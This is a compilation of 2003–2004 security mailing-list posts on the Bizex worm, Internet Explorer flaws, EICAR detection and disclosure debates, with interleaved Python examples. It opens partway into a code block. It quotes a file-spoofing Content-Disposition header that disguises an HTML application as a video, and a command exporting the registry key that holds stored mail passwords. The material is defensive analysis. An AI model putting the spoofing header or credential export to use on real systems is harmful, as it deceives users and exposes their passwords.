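    for key, values in parse_reg(reg_text).items():
        if not key.startswith(ACCOUNTS_KEY + "\\"):
            continue
        stored = {n: len(v[1]) for n, v in values.items()
                  if n.lower().endswith("password2") and v[0] == "REG_BINARY"}
        if stored:
            findings.append({
                "account_key": key.rsplit("\\", 1)[1],
                "account_name": values.get("Account Name", ("REG_SZ", ""))[1],
                "user_names": {n: v[1] for n, v in values.items() if n.endswith("User Name")},
                "password_values": stored,    # value name -> blob length in bytes
            })
    return findings


if __name__ == "__main__":
    for f in stored_mail_credentials(SAMPLE_REG):
        print(f"account {f['account_key']} ({f['account_name']}): "
              f"users={f['user_names']} stored={f['password_values']}")
```

Run it against a real export (`reg export "HKCU\Software\Microsoft\Internet Account Manager" accounts.reg` from a Windows box, then feed the file's text to stored_mail_credentials) to see which accounts would be exposed to the recovery tools the reply mentions; the account 0002 in the sample, which prompts instead of storing, is reported clean.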
[Full-Disclosure] Fw: [Unpatched] The Bizex worm
We have all talked about how most viruses and worms that actually spread in the wild could have been written so much better by any one of us. I guess someone stepped forward and took the bait. Everything indicates that Bizex is a worm which was created as a hired job. Its primary purpose was to collect banking information and create an army of zombie machines. To accomplish this, it exploited a range of vulnerabilities, the latest of which was published as recently as February 19th on the Bugtraq mailing list. The antivirus companies are finally starting to update their signatures, hours after Bizex has already infected between 50,000 and 100,000 machines (Kaspersky). Luckily, the main distribution sites have now been shut down which has halted the spread but left us with an army of zombie machines waiting for new instructions on port 1534. New variants of Bizex are expected in the near future. Locking down the My Computer zone prevented Bizex from infecting a Windows system, a feature which is implemented as a demonstration fix in the currently available Qwik-Fix beta ( www.qwik-fix.net ) and which Microsoft is also implementing in the upcoming Windows XP Service Pack 2, slated for release around June.
More information about Bizex can be found at
http://www.kaspersky.com/news.html?id=4277566
http://www.viruslist.com/eng/viruslist.html?id=1029528
http://securityresponse.symantec.com/avcenter/venc/data/w32.bizex.worm.html
http://www.sophos.com/virusinfo/analyses/w32bizexa.html
http://us.mcafee.com/virusInfo/default.asp?id=descriptionvirus_k=101044
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
-Original Message-
From: Thor Larholm
Sent: Tuesday, February 24, 2004 5:31 PM
To: Thor Larholm
Subject: [Unpatched] The Bizex worm
Dear Unpatched subscriber,
Today a new worm was discovered in the wild, called Bizex. Employing a multilayered attack, spread and infection approach it spreads through several vulnerabilities and exploits in multiple technologies such as email attachments, ICQ instant messaging and HTTP web pages. Some of these vulnerabilities are without patches from the vendor, raising the level of potential damage. Kaspersky is currently labelling this a global epidemic with more than 50,000 infections just among ICQ users. Likewise, implementing multiple layers of defense can help mitigate the threat posed by multilayered worms such as Bizex. The currently available BETA version of Qwik-Fix completely protects against the Bizex worm by mitigating the impact of several vulnerabilities it relies on. You can download Qwik-Fix at http://www.qwik-fix.net/ Symantec has labelled this worm W32.Bizex.worm, but has not yet published any details about it. http://securityresponse.symantec.com/avcenter/venc/data/w32.bizex.worm.html PivX Solutions are currently researching the potential impact of Bizex as well as its data gathering intentions.
Some of the vulnerabilities this worm is exploiting in its effort to spread are:
Microsoft Java virtual machine class loader
ICQ SCM local file planting
Microsoft Help CHM vulnerabilities
ADODB Stream
Internet Explorer Shell Folders
Interestingly, the shell folder vulnerability was only recently categorized as being a serious threat on February 19 in a post to the Bugtraq mailing list. This once again demonstrates how malicious criminals are more rapidly exploiting vulnerabilities as they are being announced.
Our initial analysis has shown that this worm is trying to collect credit card details from unsuspecting users, masquerading itself as a statement from banks and online trading sites, such as Wells Fargo, E*TRADE, American Express, e-gold, Verisign and LloydsTSB. It has been linked to websites that are anonymously registered to Russian individuals, is apparently created using Microsoft Visual Studio and installs a backdoor on compromised machines to be used by professional spammers. Kaspersky has released more details at http://www.kaspersky.com/news.html?id=4277566 We will keep you updated as more information is uncovered.
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
[Full-Disclosure] Microsoft confirms source code leak
There have been discussions on this mailing list as well as others about a possible leak of Windows 2000 and Windows NT 4 source code. Microsoft has now confirmed these rumours to be true. http://www.komotv.com/stories/29778.htm
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
[Full-Disclosure] Re: getting rid of outbreaks and spam
0.02 kroner coming up :)
From: Gadi Evron [0]
2. In a broader view, notifications ARE currently the problem rather than a solution.
I think we all recognize the fundamental truth that AV notifications are pure marketing. They contain no instructions on removing the virus and only serve to spread FUD. Somewhere sometime, a marketer at an AV company thought hey, let's get new customers by notifying people that send the virus!, implemented it and everybody followed suit since everybody is doing it, we might as well also. AV notifications have degenerated from a misguided assistance to become an even worse problem than the viruses they are supposed to stop.
3. I think we look at the whole problem in the wrong way, allow me to elaborate: The AV industry is built on reaction rather than prevention. Adding new signatures is still the #1 tool in the fight against malware.
I couldn't agree more. We should stop wasting time on detailing the subject lines of a new virus, what P2P folder the latest worm copies itself to or how the latest Blaster variant changes spread algorithms on the second Thursday of the month (provided it's raining in Spain). All of this does nothing to prevent any future recurrences of the same threats and is mainly of academic interest - if you're writing a paper on worm propagation techniques or a book about The 1001 funniest virus subject lines. We're all curious beings, but having my mom know the subject lines of the 5 latest viruses does nothing to prevent her from opening attachments or being infected by Blaster. We need to change our mindsets fundamentally and approach these threats from a different angle. Instead of playing archeologists that are uncovering dinosaur bones and detailing their ridges we need to become bio engineers who analyze DNA mutation patterns and create strains of tomato plants that can endure cold winter nights.
It is essential that we invest serious time and money into analyzing and matrixing the common attack, spread and infection vectors of the threats that our corporate networks and public infrastructure encounter, and that we use that knowledge to create targeted counteractions and proactive threat mitigations that can hinder the spread or impact of generic types of threats - in advance. This is not just a philosophy but a viable approach to applicable crafting. We at PivX Solutions have been preaching Proactive Threat Mitigation for quite some time now. I have been speaking about it at conferences (blame Canada), the panel members understood it when we explained it at the first National Cyber Security Summit and we integrated our initial efforts into Qwik-Fix which prevented dozens of threats in Q4 2003 (MiMail, lots of IE exploits, etc). I think we can all get lost in specifics from time to time, which is why it is important to remember that real security is all about risk management - how much time and money do we want to invest in lowering the inherent risk to an acceptable level? It is only when we start diverting those resources away from reactive solutions, such as antivirus that have not hindered any major virus outbreak but even created the far worse problem of AV notifications, and towards proactive appliances and proper risk management that we can minimize our risk and shorten our window of exposure to threats.
With spam and mass mailers clogging the tubes, causing us all to waste money on bigger tubes, as well as our time dealing with the annoyance (more money), shouldn't the problem be solved there (at the main tubes themselves) rather than at the end user's desktop?
They are right, it isn't currently demanded of them. ISPs and peering points should seriously consider the development and implementation of technologies that can unintrusively and anonymously detect threats and filter packets that meet certain risk criteria, before governmental agencies wake up and start addressing the issue by regulations and law that will inevitably limit their control of private property.
[0] original post http://www.securityfocus.com/archive/1/352406/2004-02-02/2004-02-08/0
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
Re: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6
You're not very detailed about what happens behind the curtain, so here goes :)
When an HTTP request returns its data, IE tries to determine the MIME type based on several factors [0]. In this case, IE determines that it cannot render the data as HTML since there is a Content-Disposition header - Content-Disposition is used whenever you e.g. output a binary file from a serverside script and want the filename to be displayed as ProjectScope.doc instead of download.php (your script's name). The Content-Disposition HTTP header itself is not to blame, it is a standard MIME header from RFC 1806 that has been widely implemented in all browsers precisely to allow arbitrary filenaming. Since IE cannot display the data itself, it displays the Open/SaveAs dialog box so that the user can decide. The %2E in the filename is URL decoded and displayed as a . (dot) in the dialog. This URL decoding should simply not be performed as we are dealing with a file dialog and not a URL dialog, if %2E had not been decoded we would not be having this issue.
Whatever action the user takes is then handled by Windows Explorer, we are now no longer dealing with IE. Windows Explorer determines what application to open the data with based on lesser rules than Internet Explorer, for one it does not look at the Content-Type header since it does not know about it. The first step of action is to compare the file extensions, only in the case of an unknown file extension does Windows Explorer perform its magic filetype guessing by inspecting the file's content. The file extension in Windows is no longer limited to 3 characters, though historical reasons have kept most application extensions confined to these. Windows Explorer parses the filename, excluding its path, and determines that the file extension is everything following the last . (dot) character, in this case .{GUID}%2Efunny.mpeg. Common extensions are either a set of printable characters or a GUID, with the latter having priority over the former. After this, a lookup is performed in the registry for HKCR\CLSID\.GUID and HKCR\.EXT, with EXT being the file extension that we discovered and GUID the CLSID we found, and a match is found for the GUID prior to the entire file extension. The GUID points at HTML Application which points at MSHTA.EXE, which is then used to display the data.
As with the .Folder issue, this definitely eases social engineering. Internet Explorer should not URL decode strings for file dialogs and Windows Explorer should not give precedence to CLSIDs.
[0] http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
- Original Message -
From: [EMAIL PROTECTED] [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, January 27, 2004 9:28 AM
Subject: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6
Tuesday, January 27, 2004
Trivial file spoofing in Internet Explorer 6.0.2800.1106 and all of 'its' patches to date on WIN XP [probably others]:
Content-Disposition: attachment; filename=malware.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}fun_ball_gites_pie_throw%2Empeg
Absolute bare minimum working demo [perhaps even feeble] as we are absolutely confident the self-appointed resident gooroo will be along shortly handing out packets of two cents to everyone thus saving us the effort to illustrate in even greater detail to those lacking imagination: http://www.malware.com/gooroo.html
End Call -- http://www.malware.com
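A model of the chain the reply above describes, added here as an example; it is neither the poster's demo nor Microsoft's code. It follows the reply's account: IE percent-decodes the filename for the dialog (so the user sees .mpeg), the shell takes everything after the last dot as the extension, and a {CLSID} inside that extension takes precedence. The CLSID is the one from the original post, which the reply says resolves to the HTML Application handler; that the undecoded name is what the shell parses is an assumption drawn from the reply's ".{GUID}%2E..." extension analysis. filename_problems is the check a server or download gateway could apply before emitting a Content-Disposition filename, and it also covers the .Folder case the reply refers to.

```python
import re
from urllib.parse import unquote

# CLSID from the original post; the reply above says it resolves to the HTML
# Application handler (MSHTA.EXE).  Compared case-insensitively.
HTA_CLSID = "{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}"
CLSID_RE = re.compile(r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I)
PARAM_RE = re.compile(r'\s*([\w*-]+)\s*=\s*(?:"([^"]*)"|([^;]*))')


def parse_content_disposition(header):
    """Split 'attachment; filename=...; name=...' into (disposition, params).
    Minimal RFC 2183-style parser: quoted or bare values, no filename* forms."""
    disposition, _, rest = header.partition(";")
    params = {}
    for m in PARAM_RE.finditer(rest):
        value = m.group(2) if m.group(2) is not None else m.group(3)
        params[m.group(1).lower()] = value.strip()
    return disposition.strip().lower(), params


def shell_extension(name):
    """Extension as the reply describes Explorer computing it: everything
    after the last '.', or '' when the name has no dot."""
    _, dot, ext = name.rpartition(".")
    return ext if dot else ""


def analyse_download(header):
    """What the user sees in the Open/Save dialog versus what the shell acts on."""
    disposition, params = parse_content_disposition(header)
    raw = params.get("filename", "")
    shown = unquote(raw)               # IE percent-decoded the name for the dialog
    stored_ext = shell_extension(raw)  # assumed: the raw name is what the shell parses
    clsid = CLSID_RE.search(stored_ext)
    return {
        "disposition": disposition,
        "shown": shown,
        "shown_ext": shell_extension(shown).lower(),
        "stored_ext": stored_ext,
        "clsid": clsid.group(0).lower() if clsid else None,
        "opens_as_hta": clsid is not None and clsid.group(0).lower() == HTA_CLSID,
    }


def filename_problems(raw):
    """Reasons a server or download gateway should refuse to emit this filename
    in Content-Disposition.  An empty list means nothing suspicious was found."""
    problems = []
    decoded = unquote(raw)
    if CLSID_RE.search(raw):
        problems.append("contains a {CLSID} token")
    if "%" in raw:
        problems.append("contains percent-encoding")
    if shell_extension(decoded).lower() != shell_extension(raw).lower():
        problems.append("extension changes when percent-decoded")
    if shell_extension(decoded).lower() == "folder":
        problems.append("uses the .Folder extension")
    return problems


if __name__ == "__main__":
    demo = ("attachment; filename=malware.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}"
            "fun_ball_gites_pie_throw%2Empeg")
    for k, v in analyse_download(demo).items():
        print(f"{k:13s} {v}")
    print(filename_problems(demo.split("filename=", 1)[1]))
```

The two views of the same header are the whole point: shown_ext comes back as "mpeg" while stored_ext begins with the CLSID, so the dialog and the shell disagree about what the file is.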
Re: [Full-Disclosure] Windows XP Explorer Executes Arbitrary Code in Folders
I just sent this to the other lists:
Why don't we call a spade a spade? You renamed an HTML file from My Pics.html to My Pics.Folder, it's still an HTML file and not a folder. In fact, except for the changed file extension this is simply just a repeat of your previous post, Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV, except that the .Folder file extension is new to Windows XP and makes the file have a folder icon. When you open any file regardless of extension, Explorer tries to find the proper application to open the file with. This involves inspecting the first section of the file's content and comparing it to a list of known signatures. You can read about MIME Type Detection in Internet Explorer at http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp We already know that opening HTML files from the My Computer zone is equivalent to opening an EXE file, given the executional rights provided by the zone. The only solution to this is to lock down the My Computer zone which I have been trying to advocate for some time now and Microsoft has now promised to do in Service Pack 2 for Windows XP.
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
- Original Message -
From: JacK [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Monday, January 26, 2004 4:54 AM
Subject: [Full-Disclosure] Windows XP Explorer Executes Arbitrary Code in Folders
Hello, http://www.securitytracker.com/alerts/2004/Jan/1008843.html
-- JacK
Re: [Full-Disclosure] Outlook Express - is this possible?
From: Nick FitzGerald [EMAIL PROTECTED]
Gregh [EMAIL PROTECTED] wrote:
I believe an exploit cropped up within the last 12 months or so for OE (version unknown) where the user has preview pane OFF and receives an email that he doesn't actually double click on to open. However, in deleting it, the user either web bugs himself or puts some sort of exploit in.
There was an exploitable buffer overflow in a date handling routine in some .DLL (MSHTML.DLL ???) that OE used for its date functions. I have a feeling that was closer to two years ago, but have not bothered to search the archives to check...
It was almost 4 years ago, roughly 3½ to be exact, on July 18 2000. Microsoft Outlook / Outlook Express GMT Field Buffer Overflow Vulnerability http://www.securityfocus.com/bid/1481 Details in original post: http://www.securityfocus.com/archive/1/70543 You just had to download the email to be exploited.
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
Re: [Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV
From: morning_wood [EMAIL PROTECTED]
running malware.html locally does produce the desired results, but then again...
The exploit is intended and created to be run locally from a local security zone - getting to a local zone in the first place requires other vulnerabilities.
i can get any html to execute locally calling a remote location for the code, as long as it's run from the local machine.
There are several steps involved in most IE command execution exploits, some of these involve downloading and executing a file once you are already in a local security zone. What http-equiv did was to simplify that part of the process by using the Shell.Application object.
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
[Full-Disclosure] Comments on 5 IE vulnerabilities
irresponsible and jeopardizes the security of the Internet as a whole.
References:
[0] Qwik-Fix(r) http://www.pivx.com/qwikfix/
[1] Description of Internet Explorer Security Zones Registry Entries http://tinyurl.com/ubfq
[2] Post by Liu Die Yu http://tinyurl.com/x8qx
Regards
Thor Larholm, Senior Security Researcher, PivX Solutions
[Full-Disclosure] RE: Internet Explorer and Opera local zone restriction bypass
From: Paul Szabo [mailto:[EMAIL PROTECTED]
Storing in an unpredictable location might help. Obfuscation does not: instead of setting a cookie of BadThing, the attacker could set one that will become BadThing. The need to reverse-engineer the obfuscation, and details like possible character sets, are a minor hindrance only. Security by obscurity does not work.
If you had followed the debate in detail, you would have seen that there are several aspects to this problem. First you have to store defined content in a known location, then you have to load a locally residing file in a window object, then you have to use another vulnerability to change security zone and then you have to convince IE to render the stored content as HTML. Flash can remove the first and the last, and there is absolutely no reverse-engineering that will convince IE to render a Base64-encoded string as HTML. Loading a locally residing file in a window object brings nothing new into the world of IE exploits, and after that you STILL have to rely on yet another cross-domain vulnerability before all of this can be exploited. There is no obscurity being promised here, just an additional layer of security - encoding and decoding data when it is being stored to and read from permanent storage by Flash. Security by obscurity would only have been the case here if the data that Flash stores was sensitive or private, but it is not - all we want is to avoid having Flash used as an automated transport mechanism of data from the Internet Zone to any local security zones.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Get our research, join our mailing list - http://pivx.com/larholm/
[Full-Disclosure] Sunncomm backs down from shift key prosecution
http://www.theinquirer.net/?article=12041
[Full-Disclosure] Verisign fighting back at ICANN
So now Verisign wants to protect your privacy .. and I've got a bridge or an Eiffel Tower to sell, if you're interested. According to Verisign, ICANN is an organization whose sole existence seems to be to invade your privacy and spam you to death. http://www.verisign.com/corporate/news/2003/pr_20030930.html
QUOTES
Network Solutions® Launches Internet Privacy Web Site
Currently, the Internet Corporation for Assigned Names and Numbers (ICANN), the non-profit organization formed to assume responsibility for the domain name system management, requires all domain name holders to provide accurate contact information-name, phone number, mailing address, and e-mail address-as part of the public WhoIs database, allowing anyone to look up this information as it relates to a particular domain name. Network Solutions is working with various industry and policy organizations to minimize consumers' risk of having their personal data exploited. By visiting http://www.internetprivacyadvocate.org, consumers will find a variety of steps they can take to protect their privacy, reduce SPAM and protect their domain name registration(s) from hijacking and unauthorized transfers.
/QUOTES
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
http://pivx.com/larholm/unpatched/ - Unpatched Internet Explorer Vulnerabilities
[Full-Disclosure] Half-Life 2 source code stolen through IE exploit
http://www.halflife2.net/forums/showthread.php?s=e6e7d0ce0abe19997425ef50fa7fe1dfthreadid=10692
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
http://pivx.com/larholm/unpatched - 31 Unpatched IE Security Vulnerabilities
[Full-Disclosure] RE: Exploiting Multiple Flaws in Symantec Antivirus 2004 for Windows Mobile (fwd)
-- Forwarded message --
From: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Exploiting Multiple Flaws in Symantec Antivirus 2004 for Windows Mobile
Vulnerability #2: The Virus scanner does not appear to work at all! Like any antivirus scanner, Symantec detects the Eicar test virus (eicar.exe or eicar.txt). At least, at first glance it appears to detect it. However, you can easily defeat this by adding a few bytes of random text before or after the Eicar string. For example, if you use a hex/text editor to add a few random bytes of text before and after the string, then Symantec won't detect it! However, other AVs easily detect it, as they should. An AV scanner should be able to detect a byte stream anywhere in the file, but Symantec is easily bypassed with this rudimentary trick.
The discussion of when to detect the EICAR test virus has been long, heated and on-going, but a few simple facts remain that we can quote directly from EICAR themselves. From http://www.eicar.org/anti_virus_test_file.htm we can read:
Any anti-virus product that supports the EICAR test file should detect it in any file providing that the file starts with the following 68 characters, and is exactly 68 bytes long
The first 68 characters is the known string. It may be optionally appended by any combination of whitespace characters with the total file length not exceeding 128 characters. The only whitespace characters allowed are the space character, tab, LF, CR, CTRL-Z.
The test string has to be at the start of the file and you're only allowed to append the above whitespace characters after the end of the test string, up until a file length of 128 characters (60 whitespace characters). Since you added random bytes of text, which are not whitespace, at both start and end, your file was no longer the EICAR test virus file.
We can argue from this day to the heat death of the sun about whether the heuristic engine in the AV product should have caught these variations and whether that engine might deliberately not check the EICAR test virus for variations, but only EICAR and the specific AV vendors can provide their views on why they choose to do as they did.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
http://www.pivx.com/larholm/unpatched - Unpatched IE vulnerabilities
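The eicar.org definition quoted in the reply above, turned into a check; this is an added example and not code from the post, from EICAR or from any vendor. is_eicar_test_file implements the rules exactly as quoted (the 68-byte string at offset 0, only the five listed whitespace bytes after it, at most 128 bytes in total), contains_eicar_string is the looser "anywhere in the file" expectation the original report had, and classify_samples runs constructed variants, including the prepended- and appended-bytes cases the report describes, through both so the two definitions can be compared. The sample variants are made up here; the string itself is the public test string.

```python
# The 68-byte EICAR test string, as published at eicar.org and quoted above.
# rb"" keeps the backslash literal.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
EICAR_MAX_LEN = 128
EICAR_TRAILER = b" \t\n\r\x1a"   # space, tab, LF, CR, CTRL-Z: the only bytes allowed after it


def is_eicar_test_file(data):
    """True only for files that meet the eicar.org definition quoted above:
    the 68-byte string at offset 0, then nothing but the listed whitespace
    bytes, and a total length of at most 128 bytes."""
    if len(data) > EICAR_MAX_LEN or not data.startswith(EICAR):
        return False
    return all(b in EICAR_TRAILER for b in data[len(EICAR):])


def contains_eicar_string(data):
    """What the original report assumed a scanner should do: match the string
    anywhere in the file.  Kept only to show how the two definitions differ."""
    return EICAR in data


def classify_samples():
    """Constructed variants (made up for this example, not real submissions)
    and how each definition rates them: name -> (meets_spec, string_anywhere)."""
    samples = {
        "exact":           EICAR,
        "trailing_ws":     EICAR + b"\r\n\x1a",      # allowed trailer, 71 bytes
        "ws_past_128":     EICAR + b" " * 61,        # allowed bytes, but 129 long
        "prepended_bytes": b"junk" + EICAR,          # the report's "before" case
        "appended_bytes":  EICAR + b"junk",          # the report's "after" case
        "not_eicar":       b"MZ\x90\x00",
    }
    return {name: (is_eicar_test_file(d), contains_eicar_string(d))
            for name, d in samples.items()}


if __name__ == "__main__":
    for name, (spec, anywhere) in classify_samples().items():
        print(f"{name:16s} meets_spec={spec!s:5s} string_anywhere={anywhere}")
```

The prepended and appended variants are exactly the ones where the two columns disagree: the string is present, but the file is no longer the EICAR test file as EICAR defines it, which is the distinction the reply draws.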
[Full-Disclosure] RE: Symantec wants to criminalize security info sharing
I sincerely hope this is a gross misquote. You can't have any kind of research, whether it's security research online or academic research offline of any kind, without the very likely potential of bad guys having access to the same information and papers you release. Following through on this would be equal to outlawing any kind of university research that could be used by 'bad guys', whatever form those might currently be - in effect, shutting down any kind of research. It's a slippery slope leading to chaos, and I doubt John Schwarz realizes the implications of his suggestion. This would effectively outlaw the entire private security industry and leave it in the bureaucratically impaired hands of the exempted government to secure any kind of American software. I guess a few of the big players, such as Symantec, could be gradually incorporated in those governmental efforts, at the sacrifice of independent research. This would undermine and endanger software security more than any effort displayed so far by the 'bad guys'. On the positive side, it would at least weaken the monopoly of Microsoft severely by forcing the rest of the world to no longer use American software due to its inherent insecurities caused by a lack of independent security research. I doubt most of us realize the implications already caused by having those suggestions raised at a House Committee, not too many steps away from becoming part of new proposals. You should never let your fear conquer your logic, it will only produce well intended but damaging results.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
-Original Message-
From: Richard M. Smith [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 11, 2003 6:47 AM
To: [EMAIL PROTECTED] COM
Subject: Symantec wants to criminalize security info sharing
Hi, Here's an interesting quote from John Schwarz, the COO of Symantec, in a Wired.com article from today: Just Say No to Viruses and Worms http://www.wired.com/news/infostructure/0,1377,60391,00.html
But perhaps the most controversial suggestion came from John Schwarz, president and COO of antivirus firm Symantec, who called for legislation to criminalize the sharing of information and tools online that can be used by malicious hackers and virus writers.
As we all know, when it comes to discussing information about computer security vulnerabilities, it is difficult to separate security uses of this information and hacking uses of the same information. For example, if Symantec were to get this law passed, are they prepared to see their employees who work on the Bugtraq email list go to jail? ;-)
Richard M. Smith http://www.ComputerBytesMan.com
[Full-Disclosure] RE: Computer Sabotage by Microsoft
Automatic system updates are nothing new, we see it all the time with antivirus software. Given that the enduser has agreed for his AV to be updated automatically, none of us see any moral, ethical or legal implications with that scenario.

The legality of this in regards to your XBox all boils down to whether you have given sufficient permission for maintenance installations on your system. Could you have given permission in any of the EULA or shrinkwrap licenses for your Xbox itself? (Did you read any of them?). Did you give permission for this as part of your Xbox-live subscription? If so, is that license valid? European courts generally think less of shrinkwrap licenses, and most paragraphs in them need to be reasonably valid and not cause excess harm or distress to the enduser who may not be fully aware of the extent of the license he is agreeing to.

So was this computer sabotage or the fulfillment of a service agreement between you and the vendor? I can see how this specific update might not benefit you tremendously personally, given that you, like many others who see the Xbox as a cheap server paid partly by Microsoft, have come to expect and depend on this particular vulnerability to exist, but the fact remains that this is an identified security vulnerability that disrupts the ordinary privilege handling of the system, in particular to the executing of unsigned code. We may disagree with Microsoft on whether only signed code should be allowed to execute on the Xbox, but that is a completely different discussion. The crux here is with the method of delivery.

One thing is sure, we will see a greater level of automation for patch management in the future. I can reasonably imagine the default installation of Longhorn to automatically download and install critical security updates, and given an agreement like we already have with most AV software I see no problems in that.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

-Original Message-
From: Stefan Esser [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 11, 2003 11:31 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Computer Sabotage by Microsoft

Hi,

well it finally happened. I came back home after work, connected my XBOX to the internet and went into the XBOX-Live menu configuration. Well what happened. The XBOX started automatically downloading the new crappy XBOX-Live dashboard, which is of course fixed.

This is IMHO an act of computer sabotage. I have never allowed MS to modify my dashboard or to auto update my dashboard.

Is there any lawyer on the list who can point me to the right paragraphs? I do not believe this computer sabotage is legal in any European country.

Yours,
Stefan Esser

--
Stefan Esser [EMAIL PROTECTED]
e-matters Security http://security.e-matters.de/
GPG-Key: gpg --keyserver pgp.mit.edu --recv-key 0xCF6CAE69
Key fingerprint: B418 B290 ACC0 C8E5 8292 8B72 D6B0 7704 CF6C AE69
--
Did I help you? Consider a gift: http://wishlist.suspekt.org/
--
Re: [Full-Disclosure] Internet explorer 6 on windows XP allows execution of arbitrary code
The new addition here is abusing how you are able to load a resource file, residing in a local security zone, into a window object. Service Pack 1 for IE6 did a lot to deter this on most regular window objects, but should have extended that effort to searchpanes as well. Seeing as the content of a search pane can be any registered COM extension to IE, perhaps more should be done to completely separate these from the reach of ordinary scripting.

Combining the mediabar resource loading with the file-protocol proxy demonstrates just how effectively one can combine several vulnerabilities to achieve a higher level of automation in planting and executing files. The media bar resource loading, and any other resource loading technique, can be combined with any other cross-domain scripting vulnerability to achieve the same result. We will definitely see more combinatorial vulnerabilities in the time to come.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
http://www.pivx.com/larholm/unpatched - Unpatched IE vulnerabilities

- Original Message -
From: jelmer [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Thursday, September 11, 2003 3:31 PM
Subject: [Full-Disclosure] Internet explorer 6 on windows XP allows execution of arbitrary code

Internet explorer 6 on windows XP allows execution of arbitrary code

DESCRIPTION:
Yesterday Liu Die Yu released a number series of advisories concerning internet explorer. By combining one of these issues with an earlier issue I myself reported a while back you can construct a specially crafted webpage that can take any action on a user's system including but not limited to installing trojans, keyloggers, wiping the user's harddrive etc.

snip

http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html
[Full-Disclosure] Liu Die Yu findings verified, details
Some of you may find that Liu's webpage at safecenter.net/liudieyu is inaccessible - this is caused by DNS problems. My USA based machines resolve safecenter.net to 64.85.73.31 which doesn't know about any liudieyu, while my EU based machines resolve safecenter.net to 66.70.10.15 where you can find his site. Interested people should change their hosts file.

Since Liu is testing on IE6 Gold (6.0.2600..xpclnt_qfe.021108-2107), some of the vulnerabilities he has found are long patched, while others still exist in IE6 SP1. Some are patched at an unknown time without notice in any security bulletin, others are explicitly patched by the latest cumulative IE patch, MS03-032, which can be found at http://www.microsoft.com/technet/security/bulletin/MS03-032.asp

Works:
==
WsOpenFileJPU, cross-domain scripting
HiJackClick: 1+1=2, pointing mouseclicks on non-IE windows, adding to favorites
NAFjpuInHistory, cross-domain scripting
WsFakeSrc, cross-domain scripting
NAFfileJPU, cross-domain scripting
BackMyParent2: Multi-Thread version, cross-domain scripting
RefBack, cross-domain scripting

Doesn't work:
=
Findeath, patched by MS03-032
LinkillerJPU, patched by MS03-032
WsBASEjpu, specifically patched by MS03-032
BodyRefreshLoadsJPU
WsOpenJpuInHistory

The impact of the working cross-domain scripting vulnerabilities has been known for ages: cookie theft, identity theft, stealing sensitive information such as banking data and, once you get a window object pointed at a local zone, local file reading and command execution. Hijacking mouse events for IE and routing them to non-IE/system windows is sure to reveal several new vulnerabilities or variations in the time to come.

With these 7 new, the total number of publicly known unpatched vulnerabilities in IE is now at 30: http://www.pivx.com/larholm/unpatched/

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Re: [Full-Disclosure] MS03-032 Patch Updated or NOT ?
The bulletin is updated, not the patch. From the Technical Details:

Microsoft is investigating these reports and will re-issue this bulletin with an updated patch that corrects these problems.

/Thor

Quoting Elv1S [EMAIL PROTECTED]:

on MS website, the security bulletin MS03-032 was updated on sept 8:
V1.3 (September 8, 2003): Added information regarding reports that the patch provided does not properly correct the Object Type Vulnerability (CAN-2002-0532)

But after applying the patch, rebooting - and making a test on k-otik:
http://www.k-otik.com/MS03-032-TEST/
http://www.k-otik.com/MS03-032-TEST2/

I'm still vulnerable !!! So updated or not ??
[Full-Disclosure] RE: BAD NEWS: Microsoft Security Bulletin MS03-032
Updated antivirus will only catch specific instances of POC code, not any actual real-life exploitation which easily differs significantly in footprint and signature. It's been a constant nuisance the last few years that whenever you release any kind of POC the AV vendors will label it as a virus and have their customers feel safe whenever they try to demonstrate publicly available POC code, while still doing nothing to hinder exploitation of the actual vulnerability.

AV vendors should realize that their approach to security often will lead to greater insecurity. I have no count of the number of people writing me and telling me they would not install a potentially system-damaging patch since my public POC didn't work anyway on their system because of their superior AV product. Out of sight, out of mind..

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Monday, September 08, 2003 12:17 PM
Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032

Updated antivirus software should catch this exploit and prevent any application from being launched. We have McAfee VirusScan 7 Ent. which caught both exploit examples at http://greymagic.com/adv/gm001-ie/

Andrew Becker
C.H. Mortgage, D.R. Horton
Phoenix IT/MIS Department
Phone: (866) 639-7305
Fax: (480) 607-5383
Re: [Full-Disclosure] Re: [tool] the new p0f 2.0.1 is now out
